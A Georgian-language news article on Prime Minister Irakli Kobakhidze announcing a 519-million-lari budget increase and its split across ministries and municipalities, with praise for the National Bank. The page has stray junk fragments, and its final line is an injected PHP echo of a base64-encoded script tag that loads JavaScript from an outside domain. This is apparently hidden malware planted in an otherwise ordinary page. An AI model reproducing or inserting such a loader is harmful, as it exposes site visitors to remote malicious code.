celsiusi
ავერსი შნაიდერი

 პრემიერ-მინისტრის, ირაკლი კობახიძის განცხადებით, მიმდინარე წლის ბიუჯეტი 519 მილიონი ლარით გაიზარდა. ამის შესახებ მან მთავრობის სხდომაზე განაცხადა.

„როგორც მოგეხსენებათ, პირველი ორი კვარტლის განმავლობაში გვქონდა მაღალი ეკონომიკური ზრდა და ფისკალური კონსოლიდაციის მაღალი მაჩვენებელი. ამ ყველაფერმა მოგვცა ბიუჯეტის გაზრდის საშუალება. მთლიანობაში 519 მლნ ლარით შეგვიძლია გავზარდოთ წლევანდელი ბიუჯეტი. უკვე ვიმსჯელეთ ამ თანხის სავარაუდო განაწილებასთან დაკავშირებით და ვფიქრობთ, რომ ეს თანხები განაწილდება შემდეგი სახით: 115 მილიონით გაიზრდება ჯანდაცვის სამინისტროს ბიუჯეტი; 100 მლნ დაემატება თავდაცვის სამინისტროს; 80 მლნ დაემატება განათლების, მეცნიერებისა და ახალგაზრდობის სამინისტროს; 33 მლნ-ით გაიზრდება კულტურისა და სპორტის სამინისტროს ბიუჯეტი; 10 მლნ დაემატება შსს-ს; 10 მლნ რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს; 6 მლნ საგარეო საქმეთა სამინისტროს ბიუჯეტს დაემატება; ცესკო-ს 3 მლნ დაემატება; 60 მლნ ლარით გაიზრდება სტიქიის სალიკვიდაციო ღონისძიებების ბიუჯეტი და 102 მლნ გადაეცემა მუნიციპალიტეტებს.

ასევე, აღვნიშნავ, რომ ეკონომიკისთვის, ბუნებრივია, ძალიან მნიშვნელოვანია ეროვნული ვალუტის სტაბილურობა. როგორც მოგეხსენებათ, გვქონდა მოკლევადიანი რყევა გარკვეული პერიოდის განმავლობაში, რაზეც ჩვენი ოპოზიცია დიდ იმედებს ამყარებდა, თუმცა სწრაფი ეკონომიკური ზრდის წყალობით და ასევე, ეფექტიანი მართვის წყალობით, ლარის კურსი ძალიან მალე დაუბრუნდა პირვანდელ ნიშნულს. ამისთვის მადლობა მინდა გადავუხადო, განსაკუთრებით, საქართველოს ეროვნულ ბანკს, ნათია თურნავას, რომელმაც ეფექტიანად მართა ეს პროცესი და საბოლოო ჯამში, უზრუნველყო ეროვნული ვალუტის სტაბილურობა. ყველას გახსოვთ როგორც ცდილობდნენ ოპოზიცია და მათი მფარველები, მეგობრები, საქართველოს ეროვნული ბანკის დაკომპლექტებას საკუთარი კადრებით. არც მინდა წარმოვიდგინო, რა მოხდებოდა იმ შემთხვევაში, თუ დღეს ეროვნული ბანკი სწორედ ოპოზიციის კადრებით დაკომპლექტდებოდა. გვახსოვს ასეთი პროცესები წინა წლებიდან, რა თქმა უნდა, ამის გამეორებას ვერ დავუშვებთ. გვაქვს სწრაფი ეკონომიკური ზრდა. წინასწარი მონაცემებით, ივნისში ასევე დაფიქსირდება ზრდის მაღალი მაჩვენებელი. გვაქვს კარგი ტენდენციები, ველოდებით კარგ ტურისტულ სეზონს, პირველი ორი კვარტლის მონაცემებიც კარგი და დამაიმედებელია. ასეთ პირობებში, გვაქვს ყველანაირი წინაპირობა, რომ წელს შარშანდელზე უკეთესი ეკონომიკური მაჩვენებლები დაფიქსირდეს“, - განაცხადა ირაკლი კობახიძემ.

140
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");